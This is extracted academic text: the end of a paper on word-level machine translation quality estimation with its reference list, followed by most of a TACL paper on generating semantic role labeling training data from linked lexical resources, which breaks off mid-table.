Sättigung der Grund- farbe zu erstellen . Source The Video Preview plug - in supports RGB , grayscale , and indexed images . MT Mit dem Zusatzmodul “ Videovorschau ” unterstützt RGB- , Graustufen- und indizierte Bilder . PE (Reference) Das Zusatzmodul “ Videovorschau ” unterstützt RGB- , Graustufen- und indizierte Bilder . APE Das Dialogfeld “ Videovorschau ” unterstützt RGB- , Graustufen- und indizierte Bilder . STACKEDQE Mit dem Zusatzmodul “ Videovorschau ” unterstützt RGB- , Graustufen- und indizierte Bilder . APEQE Mit dem Zusatzmodul “ Videovorschau ” unterstützt RGB- , Graustufen- und indizierte Bilder . FULLSTACKEDQE Mit dem Zusatzmodul “ Videovorschau ” unterstützt RGB- , Graustufen- und indizierte Bilder . Table 13: Examples on WMT16 validation data. Shown are the source and translated sentences, the gold post-edited sentences, the output of the APE system, and the QE predictions of our pure QE and APE-based QE systems as well as their combination. Words predicted as OK are shown in green, those predicted as BAD are shown in red, and differences between the translated and the post-edited sentences are shown in blue. For both examples, the full stacked system predicts all quality labels correctly. Figure 3: Averaged number of words predicted as BAD by the different systems in the WMT16 gold dev set, for different bins of the sentence length. the correct sequential prediction. In the bottom ex- ample, the pure QE system assigns the correct label to Zusatzmodul, while the APE system mistranslates this word to Dialogfeld, leading to a wrong predic- tion by the APEQE system. On the other hand, pure QE misclassifies unterstützt RGB- as BAD words, while the APEQE gets them right. Overall, the APEQE is more accurate in this example. Again, these decisions complement each other well, as can be seen by the combined QE system which outputs the correct word labels for the entire sentence. 7 Conclusions We have presented new state of the art systems for word-level and sentence-level QE that are consid- erably more accurate than previous systems on the WMT15 and WMT16 datasets. First, we proposed a new pure QE system which stacks a linear and a neural system, and is simpler and slighly more accurate than the currently best word-level system. Then, by relating the tasks of APE and word-level QE, we derived a new APE- based QE system, which leverages additional artifi- cial roundtrip translation data, achieving a larger im- provement. Finally, we combined the two systems via a full stacking architecture, boosting the scores even further. Error analysis shows that the pure and APE-based systems are highly complementary. The full system was extended to sentence-level QE by virtue of a simple word-to-sentence conversion, re- 215 quiring no further training or tuning. Acknowledgments We thank the reviewers and the action edi- tor for their insightful comments. This work was partially supported by the the EXPERT project (EU Marie Curie ITN No. 317471), and by Fundação para a Ciência e Tecnolo- gia (FCT), through contracts UID/EEA/50008/2013 and UID/CEC/50021/2013, the LearnBig project (PTDC/EEI-SII/7092/2014), the GoLocal project (grant CMUPERI/TIC/0046/2014), and the Amazon Academic Research Awards program. References Rami Al-Rfou, Bryan Perozzi, and Steven Skiena. 2013. Polyglot: Distributed Word Representations for Multi- lingual NLP. In Proceedings of the Seventeenth Con- ference on Computational Natural Language Learn- ing, pages 183–192. Joshua Albrecht and Rebecca Hwa. 2008. The role of pseudo references in MT evaluation. In Proceedings of the Third Workshop on Statistical Machine Transla- tion, pages 187–190. Eleftherios Avramidis. 2012. Quality estimation for machine translation output using linguistic analysis and decoding features. In Proceedings of the Seventh Workshop on Statistical Machine Translation, pages 84–90. Jimmy Lei Ba, Jamie Ryan Kiros, and Geoffrey E Hin- ton. 2016. Layer normalization. arXiv preprint arXiv:1607.06450. Daniel Beck, Kashif Shah, Trevor Cohn, and Lucia Spe- cia. 2013. SHEF-Lite: When less is more for transla- tion quality estimation. In Proceedings of the Eighth Workshop on Statistical Machine Translation, pages 335–340. Ergun Bicici, Qun Liu, and Andy Way. 2015. Refer- ential translation machines for predicting translation quality and related statistics. In Proceedings of the Tenth Workshop on Statistical Machine Translation, pages 304–308. Ergun Biçici. 2013. Referential translation machines for quality estimation. In Proceedings of the Eighth Work- shop on Statistical Machine Translation, pages 343– 351. John Blatz, Erin Fitzgerald, George Foster, Simona Gan- drabur, Cyril Goutte, Alex Kulesza, Alberto Sanchis, and Nicola Ueffing. 2004. Confidence estimation for machine translation. In Proceedings of the Interna- tional Conference on Computational Linguistics, page 315. Ondřej Bojar, Rajan Chatterjee, Christian Federmann, Barry Haddow, Chris Hokamp, Matthias Huck, Var- vara Logacheva, , Philipp Koehn, , Christof Monz, Matteo Negri, Pavel Pecina, Matt Post, Carolina Scar- ton, Lucia Specia, and Marco Turchi. 2015. Findings of the 2015 Workshop on Statistical Machine Transla- tion. In Proceedings of the Tenth Workshop on Statis- tical Machine Translation, pages 1–46. Ondřej Bojar, Rajen Chatterjee, Christian Federmann, Yvette Graham, Barry Haddow, Matthias Huck, Anto- nio Jimeno Yepes, Philipp Koehn, Varvara Logacheva, Christof Monz, Matteo Negri, Aurelie Neveol, Mari- ana Neves, Martin Popel, Matt Post, Raphael Rubino, Carolina Scarton, Lucia Specia, Marco Turchi, Karin Verspoor, and Marcos Zampieri. 2016. Findings of the 2016 conference on machine translation. In Pro- ceedings of the First Conference on Machine Transla- tion, pages 131–198. Leo Breiman. 1996. Stacked Regressions. Machine Learning, 24:49–64. Kyunghyun Cho, Bart Van Merriënboer, Caglar Gul- cehre, Dzmitry Bahdanau, Fethi Bougares, Holger Schwenk, and Yoshua Bengio. 2014. Learning Phrase Representations Using RNN Encoder-Decoder for Sta- tistical Machine Translation. In Proceedings of Empir- ical Methods in Natural Language Processing, pages 1724–1734. François Chollet. 2015. Keras. https://github. com/fchollet/keras. William W. Cohen and Vitor R. de Carvalho. 2005. Stacked Sequential Learning. In Proceedings of In- ternational Joint Conference on Artificial Intelligence, pages 671–676. Koby Crammer, Ofer Dekel, Joseph Keshet, Shai Shalev- Shwartz, and Yoram Singer. 2006. Online Passive- Aggressive Algorithms. Journal of Machine Learning Research, 7:551–585. José G. C. de Souza, Jesús González-Rubio, Christian Buck, Marco Turchi, and Matteo Negri. 2014. FBK- UPV-UEdin participation in the WMT14 Quality Esti- mation shared-task. In Proceedings of the Ninth Work- shop on Statistical Machine Translation, pages 322– 328. José G. C. de Souza, Marcello Federico, and Has- san Sawaf. 2015. MT Quality Estimation for E- Commerce Data. In Proceedings of MT Summit XV, vol. 2: MT Users’ Track, pages 20–29. Miquel Esplà-Gomis, Felipe Sánchez-Martı́nez, and Mikel Forcada. 2015. UAlacant word-level machine translation quality estimation system at WMT 2015. 216 In Proceedings of the Tenth Workshop on Statistical Machine Translation, pages 309–315. Xavier Glorot and Yoshua Bengio. 2010. Understanding the difficulty of training deep feedforward neural net- works. In International Conference on Artificial Intel- ligence and Statistics, pages 249–256. Yvette Graham. 2015. Improving evaluation of machine translation quality estimation. In Proceedings of the Annual Meeting of the Association for Computational Linguistics, pages 1804–1813. Sébastien Jean, Orhan Firat, Kyunghyun Cho, Roland Memisevic, and Yoshua Bengio. 2015. Montreal neu- ral machine translation systems for wmt15. In Pro- ceedings of the Tenth Workshop on Statistical Machine Translation, pages 134–140. Marcin Junczys-Dowmunt and Roman Grundkiewicz. 2016. Log-linear combinations of monolingual and bilingual neural machine translation models for auto- matic post-editing. In Proceedings of the First Confer- ence on Machine Translation, pages 751–758. Marcin Junczys-Dowmunt, Tomasz Dwojak, and Hieu Hoang. 2016. Is neural machine translation ready for deployment? A case study on 30 translation directions. arXiv preprint arXiv:1610.01108. Hyun Kim and Jong-Hyeok Lee. 2016. Recurrent neural network based translation quality estimation. In Pro- ceedings of the First Conference on Machine Transla- tion, pages 787–792. Diederik P. Kingma and Jimmy Ba. 2014. Adam: A method for stochastic optimization. arXiv preprint arXiv:1412.6980. Anna Kozlova, Mariya Shmatova, and Anton Frolov. 2016. YSDA Participation in the WMT16 Quality Es- timation Shared Task. In Proceedings of the First Con- ference on Machine Translation, pages 793–799. Julia Kreutzer, Shigehiko Schamoni, and Stefan Riezler. 2015. QUality Estimation from ScraTCH (QUETCH): Deep Learning for Word-level Translation Quality Es- timation. In Proceedings of the Tenth Workshop on Statistical Machine Translation, pages 316–322. David Langlois. 2015. LORIA System for the WMT15 Quality Estimation Shared Task. In Proceedings of the Tenth Workshop on Statistical Machine Transla- tion, pages 323–329. Ngoc Quang Luong, Laurent Besacier, and Benjamin Lecouteux. 2014. LIG System for Word Level QE task at WMT14. In Proceedings of the Ninth Work- shop on Statistical Machine Translation, pages 335– 341. André F. T. Martins, Dipanjan Das, Noah A. Smith, and Eric P. Xing. 2008. Stacking Dependency Parsers. In Proceedings of Empirical Methods for Natural Lan- guage Processing, pages 157–166. André F. T Martins, Miguel B. Almeida, and Noah A. Smith. 2013. Turning on the turbo: Fast third-order non-projective turbo parsers. In Proceedings of the Annual Meeting of the Association for Computational Linguistics, pages 617–622. André F. T. Martins, Ramón Astudillo, Chris Hokamp, and Fabio N. Kepler. 2016. Unbabel’s Participation in the WMT16 Word-Level Translation Quality Estima- tion Shared Task. In Proceedings of the First Confer- ence on Machine Translation, pages 806–811. Vinod Nair and Geoffrey E Hinton. 2010. Rectified lin- ear units improve restricted Boltzmann machines. In Proceedings of the International Conference on Ma- chine Learning, pages 807–814. Franz Josef Och. 2003. Minimum error rate training in statistical machine translation. In Proceedings of the Annual Meeting on Association for Computational Linguistics, pages 160–167. Raphael Rubino, Jennifer Foster, Joachim Wagner, Jo- hann Roturier, Rasul Samad Zadeh Kaljahi, and Fred Hollowood. 2012. DCU-Symantec submission for the WMT 2012 quality estimation task. In Proceedings of the Seventh Workshop on Statistical Machine Transla- tion, pages 138–144. Rico Sennrich, Barry Haddow, and Alexandra Birch. 2016. Edinburgh Neural Machine Translation Systems for WMT 16. In Proceedings of the First Conference on Machine Translation, pages 371–376. Kashif Shah, Trevor Cohn, and Lucia Specia. 2013. An investigation on the effectiveness of features for trans- lation quality estimation. In Proceedings of the Ma- chine Translation Summit, volume 14, pages 167–174. Michel Simard, Nicola Ueffing, Pierre Isabelle, and Roland Kuhn. 2007. Rule-based translation with sta- tistical phrase-based post-editing. In Proceedings of the Second Workshop on Statistical Machine Transla- tion, pages 203–206. Matthew Snover, Bonnie Dorr, Richard Schwartz, Lin- nea Micciulla, and John Makhoul. 2006. A study of translation edit rate with targeted human annotation. In Proceedings of the 7th Conference of the Associa- tion for Machine Translation in the Americas, pages 223–231. Radu Soricut and Sushant Narsale. 2012. Combining quality prediction and system selection for improved automatic translation output. In Proceedings of the Seventh Workshop on Statistical Machine Translation, pages 163–170. Lucia Specia, Kashif Shah, Jose G.C. de Souza, and Trevor Cohn. 2013. QuEst - a translation quality estimation framework. In Proceedings of the Annual Meeting of the Association for Computational Linguis- tics: System Demonstrations, pages 79–84. 217 Lucia Specia. 2011. Exploiting objective annotations for measuring translation post-editing effort. In Proceed- ings of the 15th Conference of the European Associa- tion for Machine Translation, pages 73–80. Tijmen Tieleman and Geoffrey Hinton. 2012. Rmsprop: Divide the gradient by a running average of its recent magnitude. COURSERA: Neural Networks for Ma- chine Learning, 4(2). Marco Turchi, Antonios Anastasopoulos, José GC de Souza, and Matteo Negri. 2014. Adaptive qual- ity estimation for machine translation. In Proceedings of the Annual Meeting of the Association for Compu- tational Linguistics, pages 710–720. Nicola Ueffing and Hermann Ney. 2007. Word-level confidence estimation for machine translation. Com- putational Linguistics, 33(1):9–40. D. Wolpert. 1992. Stacked generalization. Neural Net- works, 5(2):241–260. Matthew D. Zeiler. 2012. ADADELTA: An Adaptive Learning Rate Method. arXiv preprint arXiv:1212.5701. 218 work_s24csddavbdw7gozzjdjmffafy ---- Generating Training Data for Semantic Role Labeling based on Label Transfer from Linked Lexical Resources Silvana Hartmann�, Judith Eckle-Kohler�, Iryna Gurevych�‡ � UKP Lab, Technische Universität Darmstadt ‡ UKP Lab, German Institute for Educational Research http://www.ukp.tu-darmstadt.de Abstract We present a new approach for generating role-labeled training data using Linked Lexi- cal Resources, i.e., integrated lexical resources that combine several resources (e.g., Word- Net, FrameNet, Wiktionary) by linking them on the sense or on the role level. Unlike resource-based supervision in relation extrac- tion, we focus on complex linguistic anno- tations, more specifically FrameNet senses and roles. The automatically labeled train- ing data (www.ukp.tu-darmstadt.de/ knowledge-based-srl/) are evaluated on four corpora from different domains for the tasks of word sense disambiguation and seman- tic role classification. Results show that classi- fiers trained on our generated data equal those resulting from a standard supervised setting. 1 Introduction In this work, we present a novel approach to automati- cally generate training data for semantic role labeling (SRL). It follows the distant supervision paradigm and performs knowledge-based label transfer from rich external knowledge sources to large corpora. SRL has been shown to improve many NLP appli- cations that rely on a deeper understanding of seman- tics, such as question answering, machine translation or recent work on classifying stance and reason in online debates (Hasan and Ng, 2014) and reading comprehension (Berant et al., 2014). Even though unsupervised approaches continue to gain popularity, SRL is typically still solved using supervised training on labeled data. Creating such labeled data requires manual annotations by experts,1 1Even though crowdsourcing has been used, it is still prob- resulting in corpora of highly limited size. This is especially true for the task of FrameNet SRL where the amount of annotated data available is small. FrameNet SRL annotates fine-grained semantic roles in accordance with the theory of Frame Seman- tics (Fillmore, 1982) as illustrated by the following example showing an instance of the Feeling frame including two semantic roles: HeExperiencer feltFeeling no sense of guiltEmotion in the betrayal of personal confidence. Our novel approach to training data generation for FrameNet SRL uses the paradigm of distant supervi- sion (Mintz et al., 2009) which has become popular in relation extraction. In distant supervision, the over- all goal is to align text and a knowledge base, using some notion of similarity. Such an alignment allows us to transfer information from the knowledge base to the text, and this information can serve as labeling for supervised learning. Hence, unlike semi-supervised methods which typically employ a supervised clas- sifier and a small number of seed instances to do bootstrap learning (Yarowsky, 1995), distant supervi- sion creates training data in a single run. A particular type of knowledge base relevant for distant supervi- sion are linked lexical resources (LLRs): integrated lexical resources that combine several resources (e.g., WordNet, FrameNet, Wiktionary) by linking them on the sense or on the role level. Previous approaches to generating training data for SRL (Fürstenau and Lapata, 2012) do not use lex- ical resources apart from FrameNet. For the task of lematic for SRL labeling: the task is very complex, which results in manually adapted definitions (Fossati et al., 2013), or con- strained role sets (Feizabadi and Padó, 2014). 197 Transactions of the Association for Computational Linguistics, vol. 4, pp. 197–213, 2016. Action Editor: Yuji Matsumoto. Submission batch: 9/2015; Revision batch: 1/2016; Published 5/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. www.ukp.tu-darmstadt.de/knowledge-based-srl/ www.ukp.tu-darmstadt.de/knowledge-based-srl/ word sense disambiguation (WSD), recent work on automatic training data generation based on LLR has only used WordNet (Cholakov et al., 2014), not con- sidering other sense inventories such as FrameNet. Our distant supervision approach for automatic training data generation employs two types of knowl- edge sources: LLRs and linguistic knowledge formal- ized as rules to create data labeled with FrameNet senses and roles. It relies on large corpora, because we attach labels to corpus instances only sparsely. We generate training data for two commonly dis- tinguished subtasks of SRL: first, for disambiguation of the frame-evoking lexical element relative to the FrameNet sense inventory, a WSD task; and second, for argument identification and labeling of the seman- tic roles, which depends on the disambiguation result. Regarding the subtask of FrameNet WSD, we derive abstract lexico-syntactic patterns from lexical infor- mation linked to FrameNet senses in an LLR and recover them in large-scale corpora to create a sense (frame) labeled corpus. We address the subsequent steps of argument identification and role labeling by making use of linguistic rules and role-level links in an LLR, creating a large role-labeled corpus with more than 500,000 roles. We extrinsically evaluate the quality of the auto- matically labeled corpora for frame disambiguation and role classification for verbs, using four FrameNet- labeled test-sets from different domains, and show that the generated training data is complementary to the FrameNet fulltext corpus: augmenting it with the automatically labeled data improves on using the FrameNet training corpus alone. We also evaluate our approach on German data to show that it gener- alizes across languages. We discuss in detail how our method relates to and complements recent devel- opments in FrameNet SRL. The need for additional training data has also been reported for state-of-the- art systems (FitzGerald et al., 2015). Our work has three main contributions: (i) for automatic sense labeling, we significantly extend Cholakov et al. (2014)’s distant supervision approach by using discriminating patterns and a different sense inventory, i.e., FrameNet. We show that discriminat- ing patterns can improve the quality of the automatic sense labels. (ii) We use a distant supervision ap- proach – building on LLRs – to address the complex problem of training data generation for FrameNet role labeling, which builds upon the sense labeling in (i). (iii) Our detailed evaluation and analysis show that our approach for data generation is able to gen- eralize across domains and languages. The rest of this paper is structured as follows: after introducing our approach to training data generation in section 2, we describe the automatic sense labeling (section 3) and role classification (section 4) in detail. In section 5 we apply our approach to German data. We present related work in section 6 and discuss our approach in relation to state-of-the-art FrameNet SRL in section 7, followed by discussion and outlook in section 8. Section 9 concludes. 2 Knowledge-based Label Transfer Figure 1: Automatic training data generation – overview. Our distant supervision method for generating training data for SRL consists of two stages, first gen- erating sense-labeled data, then extending these to role-labeled data, as shown in Fig.1. Both stages use large-scale corpora and LLRs as knowledge sources. Knowledge sources. For the first stage, pre- sented in detail in section 3, we use sense-level in- formation from the LLR Uby (LLR 1 in Fig.1) and exploit the sense links between the Uby versions of FrameNet, WordNet, Wiktionary and VerbNet. More specifically, we employ (i) sense examples from FrameNet, WordNet, and Wiktionary, and (ii) VerbNet information, i.e., syntactic subcategorization frames, as well as semantic roles and selectional pref- erence information of the arguments. It is important to note that the sense examples in FrameNet (called lexical unit examples) are a different resource than the FrameNet fulltext corpus. 198 For the second stage, presented in section 4, we use the LLR SemLink (LLR 2 in Fig.1) and exploit the role-level links between VerbNet semantic roles and FrameNet roles. SemLink (Bonial et al., 2013) con- tains manually curated mappings of the fine-grained FrameNet roles to 28 roles in the VerbNet role inven- tory, including more than 1600 role-level links. Formalization. More formally, we can cast our distant supervision method for automatic training data generation as a knowledge-based label transfer approach. Given a set X of seed instances derived from knowledge sources and a label space Y , a set of labeled seed instances consists of pairs {xi, yi}, where xi ∈ X, and yi ∈ Y ; i = 1, . . . , n. For an unlabeled instance uj ∈ U, j = 1, . . . , m, where U is a large corpus and U ∩ X = Ø, we employ label transfer from {xi, yi} to uj based on a common representation rxi and ruj using a matching criterion c. The label yi is transferred to uj if c is met. For the creation of sense labeled data, we perform pattern-based labeling, where Y is the set of sense labels, rxi and ruj are sense patterns generated from corpus instances and from LLRs including sense- level links, and c considers the similarity of the pat- terns based on a similarity metric. We create role-labeled data with rule-based label- ing where Y is the set of role labels, rxi and ruj are attribute representations of roles using syntactic and semantic attributes. Attribute representations are derived from parsed corpus instances and from linguistic knowledge, also including role-level links from LLRs; here, c is fulfilled if the attribute repre- sentations match. Experimental setup. In our distant supervision approach to training data generation, we (i) create our training data in a single run (and not iteratively) (ii) perform sparse labeling in order to create training data, i.e., we need a very large corpus (e.g., unlabeled web data) in order to obtain a sufficient number of training instances. We analyze the resulting labeled corpora and evaluate them extrinsically using a clas- sifier trained on the automatically labeled data on separate test datasets from different domains. This way, we can also show that a particular strength of our approach is to generalize across domains. In the next section we present the automatic cre- ation of sense-labeled corpora (stage 1). 3 Automatic Labeling for Word Sense In this work, we are the first to apply distant super- vision-based verb sense labeling to the FrameNet verb sense inventory. We extend the methodology by Cholakov et al. (2014) who also exploit sense-level information from the LLR Uby for the automatic sense-labeling of corpora with verb senses, but use WordNet as a sense inventory. We use the same types of information and similarity metric (which we call sim in this paper), but our label space Y is given by the FrameNet verb sense inventory (|Y |=4,670), and therefore we exploit 42,000 sense links from FrameNet to WordNet, VerbNet and Wiktionary. The similarity metric sim ∈ [0..1] is based on Dice’s coefficient and considers the common n- grams, n = 2, . . . , 4: (1) sim(rxi, ruj ) = 4∑ n=2 |Gn(p1)∩Gn(p2)|·n normw where w >= 1 is the size of the window around the target verb, Gn(pi), i ∈ {1, 2} is the set of n-grams occurring in rxi and ruj , and normw is the normal- ization factor defined by the sum of the maximum number of common n-grams in the window w.2 Step 1A: Seed Pattern extraction and filtering. We call the sense patterns rxi generated from seed in- stances xi in the LLR Uby seed patterns and follow Cholakov et al. (2014) for the generation of those seed patterns, i.e., we create lemma sense patterns (LSPs), consisting of the target verb lemma and lem- matized context only, and second, abstract sense pat- terns (ASPs), consisting of the target verb lemma and a number of rule-based generalizations of the context words. An example of each of the sense patterns for the FrameNet sense Feeling of the verb feel in the sense example He felt no sense of guilt in the betrayal of personal confidence is: 1. LSP: he feel no sense of guilt in 2. ASP: PP feel cognition of feeling in act ASPs generalize to a large number of contexts which is particularly important for identifying productively used verb senses, while LSPs serve to identify fixed constructions such as multiword expressions. 2Using n-grams instead of unigrams takes word order into account, which is particularly important for verb senses, as syn- tactic and semantic properties often correlate. 199 A drawback of Cholakov et al. (2014)’s method for seed pattern extraction is that it extracts a certain number of very similar (or even identical) seed pat- terns for different senses. Those seed patterns may lead to noise in the sense-labeled data. To prevent this problem, we developed an optional discriminating filter that removes problematic seed patterns. The intuition behind the discriminating filter is the following: some of the ASP and LSP patterns which we extract from the seed instances discriminate better between senses than others; i.e., if the same or a very similar pattern is extracted for sense wi and sense wj of a word w, i, j ∈ (1, . . . , n), n=number of senses of w, i 6= j, this pattern does not discriminate well, and should not be used when labeling new senses. We filter the ASP and LSP patterns by comparing each pattern for sense wi to the patterns of all the other senses wj, i 6= j using the similarity metric sim; if we find two patterns wi, wj whose similarity score exceeds a filtering threshold f, we greedily discard them both. The filtering may increase precision at the cost of recall, because it reduces the number of seed pat- terns. Since we use the approach on large corpora, we still expect sufficient recall. Our results show that discriminating filtering improves the quality of the automatically labeled corpus. Essentially, our discriminating filter integrates the goal of capturing sense distinctions into our approach. The same goal is pursued by Corpus Analysis Patterns (CPA pat- terns, Hanks (2013)), which have been created to capture sense distinctions in word usage by combin- ing argument structures, collocations and an ontology of semantic types for arguments. In contrast to our fully automatic approach, developing CPA patterns based on corpus evidence was a lexicographic effort. The following example compares two ASP patterns to a CPA pattern from Popescu et al. (2014): 1. CPA: [[Human]] | [[Institution]] abandon [[Ac- tivity]] | [[Plan]] 2. ASP: JJ person abandon JJ cognition of JJ quantity 3. ASP: person abandon communication which VVD PP JJ in Our abstract ASP patterns look similar, as they also abstract argument fillers to semantic classes and pre- serve certain function words. Step 1B: Sense label transfer. Using the ap- proach of Cholakov et al. (2014), we create sense patterns ruj from all sentences uj of an unlabeled corpus that contain a target verb, for instance the sen- tence u1: I feel strangely sad and low-spirited today for the verb feel. For every uj, its sense pattern ruj is then compared to the labeled seed patterns using the similarity metric sim. From the most similar seed patterns {rxi, yi} that have a similarity score above a threshold t, the set of candidate labels {yi} is ex- tracted.3 The approach picks a random sense label from {yi} and attaches it to uj. If an ASP and an LSP receive the same similar- ity score, LSPs get precedence over ASPs, i.e., the labeled sense is selected from the senses associated with the LSP. Using this method, our example sen- tence u1 receives the label Feeling. This approach leads to a sparse labeling of the un- labeled corpus, i.e., many unlabeled sentences are discarded because their similarity to the seed pattern is too low. It however scales well to large corpora be- cause it requires only shallow pre-processing, as we will show in the next section: we apply our approach to a large web corpus and analyze the resulting sense- labeled corpora. 3.1 Creating the sense-labeled corpus Unlabeled corpora. We used parts 1 to 4 of the ukWAC corpus (Baroni et al., 2009) as input for the automatic sense label transfer for the 695 verb lemmas in our test sets (see section 3.2, Test data). Seed Patterns. The seed patterns for Step 1A of the sense labeling were extracted from a) the FrameNet example sentences, and b) sense examples from resources linked to FrameNet in Uby, namely WordNet, Wiktionary, and VerbNet. Without a dis- criminating filter, this results in more than 41,700 LSP and 322,000 ASP, 11% and 89% of the total number, respectively. Adding a strict discriminating filter f=0.07 reduces the patterns to 39,000 LSP and 217,000 ASP. Proportionally more ASP are filtered, leading to 15% LSP and 85% ASP. The number of senses with patterns decreases from 4,900 to 3,900. Threshold setting. In order to determine the pa- rameter values for the label transfer, i.e., which values 3Unless t is very high, there is usually more than one candi- date sense label. 200 f t P R F1 - 0.07 0.672 0.723 0.696 - 0.1 0.672 0.712 0.692 - 0.14 0.665 0.642 0.653 - 0.2 0.68 0.633 0.656 0.2 0.2 0.683 0.566 0.619 0.14 0.2 0.689 0.566 0.621 0.1 0.2 0.702 0.544 0.613 0.07 0.2 0.713 0.526 0.605 Table 1: Combinations of f and t evaluated on FNFT-dev; configurations for best F1, R and P in bold. for threshold t, and filter f result in a high-quality training corpus, we perform an extrinsic evaluation on a development set: we use a set of automatically labeled corpora based on ukWAC section 1 generated with different threshold values to train a verb sense disambiguation (VSD) system. We evaluate preci- sion P (the number of correct instances/number of labeled instances), recall R (the number of labeled instances/all instances), and F1 (harmonic mean of P and R) of the systems on the development-split FNFT- dev of the FrameNet 1.5 fulltext corpus (FNFT), used by Das and Smith (2011). A detailed description of the VSD system follows in the next section. We varied the thresholds of the discriminating fil- ter f (Step 1A) and the threshold t (Step 1B) on the values (0.07, 0.1, 0.14, 0.2), as was suggested by Cholakov et al. (2014) for t. We also compare cor- pora with and without the discriminating filter f. To save space, we only report results with f for t = 0.2 in Table 1. As expected, increasing the pattern similarity threshold t at which a corpus sentence is labeled with a sense increases the precision at the cost of recall. Similarly, employing a discriminating filter f at t=0.2 increases precision compared to using no filter, and leads to the best precision on the validation set. Note that the discriminating filter gets stricter, i.e. discriminates more, with a lower f value. Ac- cordingly, low f values lead to the highest precision of 0.713 for the strict thresholds t=0.2 and f=0.07, indicating that precision-oriented applications can benefit from higher discrimination. Automatically labeled corpora. The setting with the highest F1 in Table 1 leads to the very large sense- labeled corpus WaS XL. We also use f and t values with the highest precision in order to evaluate the ben- efits of the discriminating filter, leading to WaS L. instances senses verbs s/v i/s WaS XL (t=0.07) 1.6*106 1,460 637 1.8 1,139 WaS X (t=0.2) 193,000 1,249 602 1.7 155 WaS L (t=0.2,f=0.07) 109,000 1,108 593 1.5 98 FNFT? 5,974 856 575 1.5 10 Table 2: Sense statistics of automatically labeled corpora. The size of these corpora ranges from 100,000 to 1.6 million sense instances with an average of 1.5 to 1.8 senses per verb, compared to 6,000 verb sense instances in FNFT?, FNFT filtered by the 695 verbs in our four test sets, see Table 2. We compare WaS L to WaS X, the corpus labeled with t = 0.2, but without filter f in order to eval- uate the impact of adding the discriminating filter. Compared to the latter corpus, WaS L contains 44% fewer sense instances, but only 12% fewer distinct senses, and 75% of the senses which are also covered by WaS XL. The number of instances per sense is Zipf-distributed with values ranging from 1 to over 40,000, leading to the average of 1,139 reported in Table 2 for WaS XL. 3.2 VSD experiments To compare the quality of our automatically sense- labeled corpora to manually labeled corpora, we per- form extrinsic evaluation in a VSD task. VSD sys- tem. We use a standard supervised setup for sense disambiguation: we extract lexical, syntactic, and se- mantic features from the various training sets and the test sets. For pre-processing, we use DKPro Core (Eckart de Castilho and Gurevych, 2014), e.g., Stanford tokenizer, TreeTagger for POS tagging and lemmatization, StanfordNamedEntityRecognizer for NER and Stanford Parser for dependency parsing. We train a logistic regression classifier in the WEKA implementation (Hall et al., 2009) using the same features as Cholakov et al. (2014). Training Corpora. We trained our VSD system on WaS XL and WaS L, and, for comparison, on the training split FNFT-train of FNFT 1.5 used by Das and Smith (2011). Test data. For evaluation, we used four different FrameNet-labeled datasets. The statistics of the test datasets are compiled in Table 3, a brief description of 201 verbs senses s/v inst(s) inst(r) Fate 526 725 1.4 1,326 3,490 MASC 44 143 3.3 2,012 4,142 Semeval 278 335 1.2 644 1,582 FNFT-test 424 527 1.2 1,235 3,078 FNFT-dev 490 598 1.2 1,450 3,857 Table 3: Test dataset statistics on verbs; inst(s/r): number of ambiguous sense and role instances in the datasets. each dataset follows. We use the frame and role anno- tations in the Semeval 2010 task 10 evaluation and trial dataset (Ruppenhofer et al., 2010). It consists of literature texts. The Fate corpus contains frame annotations on the RTE-2 textual entailment chal- lenge test set (Burchardt and Pennacchiotti, 2008). It is based on newspaper texts, texts from informa- tion extraction datasets such as ACE, MUC-4, and texts from question answering datasets such as CLEF and TREC. These two datasets were created prior to the release of FrameNet 1.5. For those sets, only senses (verb-frame combinations) that still occur in FrameNet 1.5 and their roles were included in the evaluation. The MASC WordSense sentence cor- pus (Passonneau et al., 2012) is a balanced corpus that contains sense annotations for 1000 instances of 100 words from the MASC corpus. It contains Word- Net sense labels, we use a slightly smaller subset of verbs annotated with FrameNet 1.5 labels.4 We also evaluate on the test-split FNFT-test of the FrameNet fulltext corpus used in Das and Smith (2011). 3.3 VSD results and analysis. Impact of pattern filters. A comparison of results between the WaS corpora (first block of Table 4) shows that the filters in WaS L improve precision for three out of four test sets, which shows that stronger filtering can benefit precision-oriented applications. Precision on the MASC corpus is lower when us- ing a discriminating filter. Due to the larger polysemy in MASC – on average 3.3 senses per verb (see s/v in Table 3), it contains rare senses. The reduction of sense instances caused by the discriminating filter leads to some loss of instances for those senses and a lower precision on MASC. Analysing the results in detail for the example verb tell shows that WaS XL contains all 10 senses 4This subset is currently not part of the MASC download, but according to personal communication with the developers will be published soon. of tell in MASC; WaS L contains 9 of them. How- ever, the number of training instances per sense for WaS L can be lower by factor 10 or more compared to WaS XL (e.g., tens to hundreds, hundreds to thou- sands), leading to only few instances per sense. The sparsity problem could either be solved by using a less strict filter, or by labeling additional instances from ukWAC, in order to preserve more instances of the rare senses for stricter thresholds t and f. These results also show that the noise that is added to the corpora in a low-discrimination, high-recall setting will be to a certain extent drowned out by the large number of sense instances. For WaS XL, recall is significantly higher for all test sets, leading to a higher F1. All significance scores reported in this paper are based on Fisher’s exact test at significance level p<0.05. Comparison to FNFT-train. We also compare the results of our WaS-corpora to a VSD system trained on the reference corpus FNFT-train (see Table 4). On Semeval, precision does not deviate signifi- cantly from the FNFT-train system. On FNFT-test, it is significantly lower. For WaS XL, precision is significantly lower on Fate, but significantly higher on MASC. For WaS L the precision is similar on MASC and Fate. For WaS XL, the recall is signif- icantly higher than for FNFT-train on all test sets, leading to a higher F1. This is the result of the larger sense coverage of the FrameNet lexicon, which pro- vided the seeds for the automatic labeling. Training our system directly on the FrameNet lexi- cal unit examples is, however, not a viable alternative: it leads to a system with similar precision our WaS- corpora, but very low recall (between 0.22 and 0.37). By using the sense examples in our seed patterns, we retain their benefits on sense coverage, and improve the system recall and F1 at the same time. Comparative analysis. In a detailed analysis of our results, we compare the performance of the WaS XL and FNFT-train based systems on those verbs of each test set that are evaluated for both sys- tems, i.e., the intersection It. On It, precision and F1 are higher for FNFT-train for all test sets except MASC. For MASC, precision is similar, but recall is 0.21 points higher. For the verbs in It, the average number of training senses in WaS XL is two senses higher than for FNFT-train. This larger sense cov- erage of the WaS XL is beneficial to recall on the 202 FNFT-test Fate MASC Semeval P R F1 P R F1 P R F1 P R F1 WaS XL 0.647* 0.816* 0.722 0.628* 0.65* 0.639 0.66* 0.793* 0.72 0.665 0.761* 0.71 WaS L 0.68* 0.618 0.648 0.66 0.505* 